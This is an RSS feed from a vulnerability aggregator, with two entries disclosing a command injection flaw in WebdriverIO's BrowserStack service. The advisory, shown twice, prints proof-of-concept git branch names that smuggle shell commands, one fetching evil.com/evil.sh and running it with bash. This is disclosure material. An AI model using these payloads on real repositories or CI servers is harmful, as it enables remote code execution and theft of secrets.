<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 09:19:14 +0000</lastBuildDate>
    <item>
      <title>bdu:2026-07092</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2026-07092</link>
      <description>bdu:2026-07092</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2026-07092</guid>
    </item>
    <item>
      <title>EUVD-2026-339781</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-339781</link>
      <description>EUVD-2026-339781</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-339781</guid>
    </item>
    <item>
      <title>fkie_cve-2026-25244</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-25244</link>
      <description>&lt;p&gt;WebdriverIO is a test automation framework for unit, e2e and component testing using WebDriver, WebDriver BiDi and Appium. Versions below 9.24.0 contain a command injection vulnerability leading to remote code execution (RCE) in test orchestration. Git permits branch names containing shell metacharacters, and getGitMetadataForAISelection() interpolates these names directly into execSync() calls without sanitization. An attacker can exploit this by supplying a malicious repository (via testOrchestrationOptions.runSmartSelection.source, or the current directory if unset) whose branch name carries a payload, causing the shell to execute arbitrary code. This enables remote code execution on CI/CD servers and developer machines, leading to credential and secret disclosure, source code and SSH key exfiltration, system compromise, and supply chain attacks via tampered build artifacts. The issue has been fixed in version 9.24.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;WebdriverIO is a test automation framework for unit, e2e and component testing using WebDriver, WebDriver BiDi and Appium. Versions below 9.24.0 contain a command injection vulnerability leading to remote code execution (RCE) in test orchestration. Git permits branch names containing shell metacharacters, and getGitMetadataForAISelection() interpolates these names directly into execSync() calls without sanitization. An attacker can exploit this by supplying a malicious repository (via testOrchestrationOptions.runSmartSelection.source, or the current directory if unset) whose branch name carries a payload, causing the shell to execute arbitrary code. This enables remote code execution on CI/CD servers and developer machines, leading to credential and secret disclosure, source code and SSH key exfiltration, system compromise, and supply chain attacks via tampered build artifacts. The issue has been fixed in version 9.24.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-25244</guid>
    </item>
    <item>
      <title>GHSA-5c46-x3qw-q7j7 — WebdriverIO BrowserStack Service has a Command Injection issue</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-5c46-x3qw-q7j7</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @wdio/browserstack-service&lt;/p&gt;
&lt;p&gt;### Summary
A command injection vulnerability exists in `@wdio/browserstack-service` that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads.&lt;/p&gt;
&lt;p&gt;### Details
_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._&lt;/p&gt;
&lt;p&gt;### Vulnerable Code
**File**:  https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204&lt;/p&gt;
&lt;p&gt;### Root Cause
User-controlled git branch names are directly interpolated into `execSync()` calls without sanitization. Git allows branch names to contain special characters ,that can be used for command injection.
Git allows to create these branches.
```
git checkout -b &amp;#34;main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED&amp;#34;
git checkout -b &amp;#34;main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED&amp;#34;
git checkout -b &amp;#34;main;curl\${IFS}evil.com/evil.sh\${IFS}&amp;gt;/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED&amp;#34;
```&lt;/p&gt;
&lt;p&gt;### Attack Vector
1. Attacker creates a malicious git repository with a branch name containing command injection payload
2. Attacker configures WebdriverIO to use this repository via `testOrchestrationOptions.runSmartSelection.source`. if `source` is not provided it takes current directory as `source`.
3. When `getGitMetadataForAISelection()` executes,…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @wdio/browserstack-service&lt;/p&gt;
&lt;p&gt;### Summary
A command injection vulnerability exists in `@wdio/browserstack-service` that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads.&lt;/p&gt;
&lt;p&gt;### Details
_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._&lt;/p&gt;
&lt;p&gt;### Vulnerable Code
**File**:  https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204&lt;/p&gt;
&lt;p&gt;### Root Cause
User-controlled git branch names are directly interpolated into `execSync()` calls without sanitization. Git allows branch names to contain special characters ,that can be used for command injection.
Git allows to create these branches.
```
git checkout -b &amp;#34;main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED&amp;#34;
git checkout -b &amp;#34;main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED&amp;#34;
git checkout -b &amp;#34;main;curl\${IFS}evil.com/evil.sh\${IFS}&amp;gt;/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED&amp;#34;
```&lt;/p&gt;
&lt;p&gt;### Attack Vector
1. Attacker creates a malicious git repository with a branch name containing command injection payload
2. Attacker configures WebdriverIO to use this repository via `testOrchestrationOptions.runSmartSelection.source`. if `source` is not provided it takes current directory as `source`.
3. When `getGitMetadataForAISelection()` executes,…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-5c46-x3qw-q7j7</guid>
    </item>
  </channel>
</rss>
